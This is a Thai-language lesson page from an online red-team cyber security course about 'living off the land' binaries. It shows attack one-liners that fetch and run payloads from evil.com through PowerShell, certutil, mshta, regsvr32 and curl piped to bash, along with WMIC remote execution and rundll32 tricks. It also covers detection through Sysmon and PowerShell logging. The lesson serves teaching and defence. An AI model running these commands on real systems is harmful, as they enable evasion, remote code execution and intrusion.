0Pricing
Cyber Security Academy · บทเรียน

ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)

ใช้ไบนารีของ Windows ที่เชื่อถือได้ (certutil, mshta, regsvr32) เพื่อหลบเลี่ยงการตรวจจับ

ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins) เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

LOLBins คืออะไร

ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins) คือไบนารีของ OS และเครื่องมือที่ถูกต้องตามปกติซึ่งผู้โจมตีนำมาปรับใช้เพื่อดำเนินการที่เป็นอันตราย เนื่องจากเครื่องมือเหล่านี้เป็นเครื่องมือระบบที่ได้รับความไว้วางใจและมีลายเซ็น จึงมักหลบเลี่ยงการอนุญาตพิเศษสำหรับแอปพลิเคชันและลดโอกาสการตรวจจับโดย AV/EDR ได้

เหตุใด LOLBins จึงมีประสิทธิภาพ

ข้อได้เปรียบสำหรับผู้โจมตี:

  • มีอยู่ในระบบเป้าหมายเสมอ — ไม่จำเป็นต้องนำไฟล์ใหม่ไปวาง
  • มีลายเซ็นรับรองโดยไมโครซอฟท์หรือแอปเปิล — หลบเลี่ยงการตรวจจับตามลายเซ็น
  • ได้รับความไว้วางใจจากโซลูชันอนุญาตพิเศษสำหรับแอปพลิเคชัน
  • สร้างลำดับชั้นกระบวนการที่ดูถูกต้องตามปกติ

PowerShell ในฐานะ LOLBin

PowerShell เป็น LOLBin ที่ถูกนำไปใช้ในทางที่ผิดมากที่สุด ผู้โจมตีใช้เพื่อ:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe เป็นเครื่องมือจัดการใบรับรองของ Windows ที่สามารถดาวน์โหลดไฟล์ได้:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta และ wscript

การเรียกใช้สคริปต์ผ่านโฮสต์ที่ได้รับความไว้วางใจ:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe สามารถโหลดและเรียกใช้ DLL จาก URL ระยะไกลผ่านแฟล็ก /s /n /u /i — หลบเลี่ยง AppLocker และเรียกใช้โค้ดที่ไม่มีลายเซ็นในฐานะกระบวนการที่ได้รับความไว้วางใจ:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

การเรียกใช้ผ่าน WMIC และ WMI

Windows Management Instrumentation สามารถเรียกใช้โค้ดจากระยะไกลและภายในเครื่องได้:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe โหลดและเรียกใช้จุดเริ่มต้นของ DLL:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

LOLBins บนลินุกซ์

สิ่งที่เทียบเท่ากันบนลินุกซ์:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS และ GTFOBins

ฐานข้อมูลอ้างอิง:

  • LOLBAS (lolbas-project.github.io) — ไบนารี สคริปต์ และไลบรารีของ Windows
  • GTFOBins (gtfobins.github.io) — ไบนารีของลินุกซ์หรือ macOS สำหรับการหาประโยชน์ การอ่านหรือเขียนไฟล์ และการยกระดับสิทธิ์ด้วย SUID

การตรวจจับการใช้ LOLBin ในทางที่ผิด

กลยุทธ์การตรวจจับ:

  • การบันทึกบล็อกสคริปต์ของ PowerShell (EventID 4104) — บันทึกคำสั่งที่ถอดรหัสแล้ว
  • Sysmon EventID 1: การสร้างกระบวนการพร้อมสายโซ่กระบวนการแม่
  • แจ้งเตือนเมื่อกระบวนการแม่กับกระบวนการลูกไม่เป็นไปตามคาด: Word → PowerShell, Excel → cmd
  • การเชื่อมต่อเครือข่ายจาก certutil, mshta และ PowerShell
  • ใช้ค่าพื้นฐานของ UEBA เพื่อแจ้งการใช้ไบนารีที่ผิดปกติ

ตรวจสอบอย่างรวดเร็ว: LOLBins

ไบนารีของ Windows ใดที่สามารถดาวน์โหลดไฟล์ระยะไกลโดยใช้แฟล็ก -urlcache ได้

สรุปบทเรียน

LOLBins คือเครื่องมือ OS ที่ถูกต้องตามปกติแต่นำมาปรับใช้ในทางที่เป็นอันตราย ได้แก่ PowerShell, certutil, mshta, regsvr32, rundll32 และ WMIC บน Windows รวมถึง curl, python และ OpenSSL บนลินุกซ์ เครื่องมือเหล่านี้หลบเลี่ยงการตรวจจับตามลายเซ็นและการอนุญาตพิเศษสำหรับแอปพลิเคชันได้ การตรวจจับต้องอาศัยการบันทึกการสร้างกระบวนการ (Sysmon) การบันทึกบล็อกสคริปต์ของ PowerShell และค่าพื้นฐานด้านพฤติกรรม LOLBAS และ GTFOBins เป็นฐานข้อมูลอ้างอิงที่สำคัญ

คำถามที่พบบ่อย

บทเรียน “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)”

ใช้ไบนารีของ Windows ที่เชื่อถือได้ (certutil, mshta, regsvr32) เพื่อหลบเลี่ยงการตรวจจับ คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน

บทเรียน “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. เฟรมเวิร์ก C2: Cobalt Strike และ Sliver
  2. ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)
  3. เทคนิคการเคลื่อนที่ภายในเครือข่าย
  4. การเขียนรายงานเรดทีม
← กลับไปที่ Cyber Security Academy